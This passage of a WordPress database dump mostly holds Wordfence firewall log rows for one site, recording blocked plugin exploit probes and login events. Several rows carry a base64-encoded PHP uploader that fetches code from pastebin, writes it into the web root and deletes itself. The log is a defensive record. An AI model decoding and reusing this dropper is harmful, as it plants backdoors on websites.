Safari/537.36','blocked:waf','WAF-RULE-149','{\"learningMode\":0,\"failedRules\":\"149\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZGlnaXQ2MjYvY29tcGFueXJlZ2lzdHJhdGlvbi5vbmxpbmUvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(8482,0.000000,1566895590.375448,'\0\0\0\0\0\0\0\0\0\0_',0,200,0,0,0,'https://companyregistration.online/wp-login.php?action=lostpassword','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','lostPassword',NULL,NULL),(8458,1566745920.869748,1566745920.478100,'\0\0\0\0\0\0\0\0\0\0(',0,403,0,0,0,'https://companyregistration.online/wp-json/siteground-optimizer/v1/enable-option',NULL,'Go-http-client/1.1','blocked:waf','Siteground Optimizer <= 5.0.12 - Improper REST capabilities checks','{\"learningMode\":0,\"failedRules\":\"134\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vc2l0ZWdyb3VuZC1vcHRpbWl6ZXIvdjEvZW5hYmxlLW9wdGlvbg==\",\"path\":\"L3dwLWpzb24vc2l0ZWdyb3VuZC1vcHRpbWl6ZXIvdjEvZW5hYmxlLW9wdGlvbg==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(8459,1566745919.127405,1566745918.755000,'\0\0\0\0\0\0\0\0\0\0(',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(8460,1566745917.691845,1566745917.197300,'\0\0\0\0\0\0\0\0\0\0(',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Kiwi Social Share <= 2.0.10 - Unauthenticated Update Any Option','{\"learningMode\":0,\"failedRules\":\"122\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8461,1566745911.735441,1566745911.304200,'\0\0\0\0\0\0\0\0\0\0(',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8495,0.000000,1566924840.685871,'\0\0\0\0\0\0\0\0\0\0#',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8484,1566895597.443236,1566895596.975700,'\0\0\0\0\0\0\0\0\0\0_',0,403,0,0,0,'http://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(8462,1566745942.281126,1566745941.800600,'\0\0\0\0\0\0\0\0\0\0(',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php?action=cp_add_subscriber',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WAF-RULE-149','{\"learningMode\":0,\"failedRules\":\"149\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZGlnaXQ2MjYvY29tcGFueXJlZ2lzdHJhdGlvbi5vbmxpbmUvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8468,0.000000,1566856260.792499,'\0\0\0\0\0\0\0\0\0\0eF',0,503,0,0,0,'http://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/21.0.1','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(8469,1566862065.117621,1566862064.731800,'\0\0\0\0\0\0\0\0\0\0Gܲ',0,403,0,0,0,'http://companyregistration.online/wp-admin/admin-ajax.php?action=getcountryuser&cs=2',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5Wy0tNzJjN2ZiODQwYjk4OGRjYmU4MjM0ZmNjNGFmZmRjNDANCkNvbnRlbnQtRGlzcG9zaXRpb246X2Zvcm0tZGF0YTtfbmFtZV0=\",\"paramValue\":\"InBvcGltZyI7IGZpbGVuYW1lPSJzZXR0aW5nc19hdXRvLnBocCINCg0KPHRpdGxlPlZ1bG4hISBwYXRjaCBpdCBOb3chPC90aXRsZT4NCjw\\/cGhwDQpmdW5jdGlvbiBodHRwX2dldCgkdXJsKXsNCgkkaW0gPSBjdXJsX2luaXQoJHVybCk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDEwKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9IRUFERVIsIDApOw0KCXJldHVybiBjdXJsX2V4ZWMoJGltKTsNCgljdXJsX2Nsb3NlKCRpbSk7DQp9DQokY2hlY2sgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi93cC1jb250ZW50L3Z1bG4ucGhwIiA7DQokdGV4dCA9IGh0dHBfZ2V0KCdodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvcGhBTThERkgnKTsNCiRvcGVuID0gZm9wZW4oJGNoZWNrLCAndycpOw0KZndyaXRlKCRvcGVuLCAkdGV4dCk7DQpmY2xvc2UoJG9wZW4pOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrKSl7DQogICAgZWNobyAkY2hlY2suIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCiRjaGVjazIgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi92dWxuLmh0bSIgOw0KJHRleHQyID0gaHR0cF9nZXQoJ2h0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy84ODB1ZmFXRicpOw0KJG9wZW4yID0gZm9wZW4oJGNoZWNrMiwgJ3cnKTsNCmZ3cml0ZSgkb3BlbjIsICR0ZXh0Mik7DQpmY2xvc2UoJG9wZW4yKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjazIpKXsNCiAgICBlY2hvICRjaGVjazIuIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCkB1bmxpbmsoX19GSUxFX18pOw0KPz4NCg0KLS03MmM3ZmI4NDBiOTg4ZGNiZTgyMzRmY2M0YWZmZGM0MC0tDQo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"sqli\",\"ssl\":0}'),(8463,1566745933.618276,1566745933.172600,'\0\0\0\0\0\0\0\0\0\0(',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WAF-RULE-149','{\"learningMode\":0,\"failedRules\":\"149\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZGlnaXQ2MjYvY29tcGFueXJlZ2lzdHJhdGlvbi5vbmxpbmUvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8464,0.000000,1566746009.104009,'\0\0\0\0\0\0\0\0\0\0(',0,200,0,0,0,'https://companyregistration.online/wp-login.php?action=lostpassword','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','lostPassword',NULL,NULL),(8465,1566746194.536711,1566746192.750000,'\0\0\0\0\0\0\0\0\0\0YN',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8466,0.000000,1566807588.629598,'\0\0\0\0\0\0\0\0\0\0',0,302,0,3,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36','loginOK',NULL,NULL),(8467,0.000000,1566825110.323502,'\0\0\0\0\0\0\0\0\0\0fy',0,302,0,1,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginOK',NULL,NULL),(8485,1566895596.429998,1566895595.934100,'\0\0\0\0\0\0\0\0\0\0_',0,403,0,0,0,'http://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Kiwi Social Share <= 2.0.10 - Unauthenticated Update Any Option','{\"learningMode\":0,\"failedRules\":\"122\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(8471,1566862072.245287,1566862071.734000,'\0\0\0\0\0\0\0\0\0\0Gܲ',0,403,0,0,0,'http://companyregistration.online/wp-content/plugins/cherry-plugin/admin/import-export/upload.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5Wy0tMTNkM2E2NGY2YWE0YWFlZGE1NDgwMWE1Njk0MjJiYjMNCkNvbnRlbnQtRGlzcG9zaXRpb246X2Zvcm0tZGF0YTtfbmFtZV0=\",\"paramValue\":\"ImZpbGUiOyBmaWxlbmFtZT0iZmlsZXMvc2V0dGluZ3NfYXV0by5waHAiDQpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGENCg0KPHRpdGxlPlZ1bG4hISBwYXRjaCBpdCBOb3chPC90aXRsZT4NCjw\\/cGhwDQpmdW5jdGlvbiBodHRwX2dldCgkdXJsKXsNCgkkaW0gPSBjdXJsX2luaXQoJHVybCk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDEwKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9IRUFERVIsIDApOw0KCXJldHVybiBjdXJsX2V4ZWMoJGltKTsNCgljdXJsX2Nsb3NlKCRpbSk7DQp9DQokY2hlY2sgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi93cC1jb250ZW50L3Z1bG4ucGhwIiA7DQokdGV4dCA9IGh0dHBfZ2V0KCdodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvcGhBTThERkgnKTsNCiRvcGVuID0gZm9wZW4oJGNoZWNrLCAndycpOw0KZndyaXRlKCRvcGVuLCAkdGV4dCk7DQpmY2xvc2UoJG9wZW4pOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrKSl7DQogICAgZWNobyAkY2hlY2suIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCiRjaGVjazIgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi92dWxuLmh0bSIgOw0KJHRleHQyID0gaHR0cF9nZXQoJ2h0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy84ODB1ZmFXRicpOw0KJG9wZW4yID0gZm9wZW4oJGNoZWNrMiwgJ3cnKTsNCmZ3cml0ZSgkb3BlbjIsICR0ZXh0Mik7DQpmY2xvc2UoJG9wZW4yKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjazIpKXsNCiAgICBlY2hvICRjaGVjazIuIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCkB1bmxpbmsoX19GSUxFX18pOw0KPz4NCg0KLS0xM2QzYTY0ZjZhYTRhYWVkYTU0ODAxYTU2OTQyMmJiMy0tDQo=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvdXBsb2FkLnBocA==\",\"category\":\"sqli\",\"ssl\":0}'),(8479,1566895567.729437,1566895566.916200,'\0\0\0\0\0\0\0\0\0\0_',0,403,0,0,0,'https://companyregistration.online/wp-json/siteground-optimizer/v1/enable-option',NULL,'Go-http-client/1.1','blocked:waf','Siteground Optimizer <= 5.0.12 - Improper REST capabilities checks','{\"learningMode\":0,\"failedRules\":\"134\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vc2l0ZWdyb3VuZC1vcHRpbWl6ZXIvdjEvZW5hYmxlLW9wdGlvbg==\",\"path\":\"L3dwLWpzb24vc2l0ZWdyb3VuZC1vcHRpbWl6ZXIvdjEvZW5hYmxlLW9wdGlvbg==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(8480,1566895576.320791,1566895575.338300,'\0\0\0\0\0\0\0\0\0\0_',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php?action=cp_add_subscriber',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WAF-RULE-149','{\"learningMode\":0,\"failedRules\":\"149\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZGlnaXQ2MjYvY29tcGFueXJlZ2lzdHJhdGlvbi5vbmxpbmUvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8481,1566895574.921405,1566895574.568600,'\0\0\0\0\0\0\0\0\0\0_',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WAF-RULE-149','{\"learningMode\":0,\"failedRules\":\"149\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZGlnaXQ2MjYvY29tcGFueXJlZ2lzdHJhdGlvbi5vbmxpbmUvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8472,1566862092.487489,1566862092.104300,'\0\0\0\0\0\0\0\0\0\0Gܲ',0,403,0,0,0,'http://companyregistration.online/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":0}'),(8473,1566862147.695098,1566862147.153800,'\0\0\0\0\0\0\0\0\0\0Gܲ',0,403,0,0,0,'http://companyregistration.online/wp-content/plugins/barclaycart/uploadify/uploadify.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5Wy0tNTI2ZWVkYzJmMWE5MTZjYjYxZjMwYWU0YjI5NmViZmINCkNvbnRlbnQtRGlzcG9zaXRpb246X2Zvcm0tZGF0YTtfbmFtZV0=\",\"paramValue\":\"IkZpbGVkYXRhIjsgZmlsZW5hbWU9ImZpbGVzL3NldHRpbmdzX2F1dG8ucGhwIg0KQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhDQoNCjx0aXRsZT5WdWxuISEgcGF0Y2ggaXQgTm93ITwvdGl0bGU+DQo8P3BocA0KZnVuY3Rpb24gaHR0cF9nZXQoJHVybCl7DQoJJGltID0gY3VybF9pbml0KCR1cmwpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAxMCk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfSEVBREVSLCAwKTsNCglyZXR1cm4gY3VybF9leGVjKCRpbSk7DQoJY3VybF9jbG9zZSgkaW0pOw0KfQ0KJGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvd3AtY29udGVudC92dWxuLnBocCIgOw0KJHRleHQgPSBodHRwX2dldCgnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3BoQU04REZIJyk7DQokb3BlbiA9IGZvcGVuKCRjaGVjaywgJ3cnKTsNCmZ3cml0ZSgkb3BlbiwgJHRleHQpOw0KZmNsb3NlKCRvcGVuKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjaykpew0KICAgIGVjaG8gJGNoZWNrLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KDQokY2hlY2syID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvdnVsbi5odG0iIDsNCiR0ZXh0MiA9IGh0dHBfZ2V0KCdodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvODgwdWZhV0YnKTsNCiRvcGVuMiA9IGZvcGVuKCRjaGVjazIsICd3Jyk7DQpmd3JpdGUoJG9wZW4yLCAkdGV4dDIpOw0KZmNsb3NlKCRvcGVuMik7DQppZihmaWxlX2V4aXN0cygkY2hlY2syKSl7DQogICAgZWNobyAkY2hlY2syLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KDQpAdW5saW5rKF9fRklMRV9fKTsNCj8+DQoNCi0tNTI2ZWVkYzJmMWE5MTZjYjYxZjMwYWU0YjI5NmViZmItLQ0K\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYXJjbGF5Y2FydC91cGxvYWRpZnkvdXBsb2FkaWZ5LnBocA==\",\"category\":\"sqli\",\"ssl\":0}'),(8474,0.000000,1566892294.717457,'\0\0\0\0\0\0\0\0\0\0',0,302,0,3,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36','loginOK',NULL,NULL),(8475,0.000000,1566894726.458862,'\0\0\0\0\0\0\0\0\0\03',0,200,0,0,0,'http://companyregistration.online/xmlrpc.php','','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0)','loginFailInvalidUsername',NULL,NULL),(8476,1566895566.410691,1566895565.371800,'\0\0\0\0\0\0\0\0\0\0_',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(8477,1566895564.723950,1566895564.082500,'\0\0\0\0\0\0\0\0\0\0_',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Kiwi Social Share <= 2.0.10 - Unauthenticated Update Any Option','{\"learningMode\":0,\"failedRules\":\"122\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8478,1566895563.347891,1566895561.685500,'\0\0\0\0\0\0\0\0\0\0_',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8487,1566895607.387332,1566895606.992600,'\0\0\0\0\0\0\0\0\0\0_',0,403,0,0,0,'http://companyregistration.online/wp-admin/admin-ajax.php?action=cp_add_subscriber',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WAF-RULE-149','{\"learningMode\":0,\"failedRules\":\"149\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZGlnaXQ2MjYvY29tcGFueXJlZ2lzdHJhdGlvbi5vbmxpbmUvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(8489,0.000000,1566903553.183065,'\0\0\0\0\0\0\0\0\0\0E.$',0,200,0,0,0,'https://companyregistration.online/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(8490,0.000000,1566911129.592595,'\0\0\0\0\0\0\0\0\0\0g_\r',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1','loginFailInvalidUsername',NULL,NULL),(8491,0.000000,1566913304.887810,'\0\0\0\0\0\0\0\0\0\0',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8488,1566895606.650096,1566895606.224100,'\0\0\0\0\0\0\0\0\0\0_',0,403,0,0,0,'http://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WAF-RULE-149','{\"learningMode\":0,\"failedRules\":\"149\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZGlnaXQ2MjYvY29tcGFueXJlZ2lzdHJhdGlvbi5vbmxpbmUvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(8492,0.000000,1566916622.324639,'\0\0\0\0\0\0\0\0\0\0k',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8493,0.000000,1566920118.582547,'\0\0\0\0\0\0\0\0\0\0',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8494,0.000000,1566923623.003783,'\0\0\0\0\0\0\0\0\0\0e2',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL);
/*!40000 ALTER TABLE `wpxb_wfhits` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wfhoover`
--

DROP TABLE IF EXISTS `wpxb_wfhoover`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wfhoover` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `owner` text DEFAULT NULL,
  `host` text DEFAULT NULL,
  `path` text DEFAULT NULL,
  `hostKey` varbinary(124) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k2` (`hostKey`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wfhoover`
--

LOCK TABLES `wpxb_wfhoover` WRITE;
/*!40000 ALTER TABLE `wpxb_wfhoover` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_wfhoover` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wfissues`
--

DROP TABLE IF EXISTS `wpxb_wfissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wfissues` (
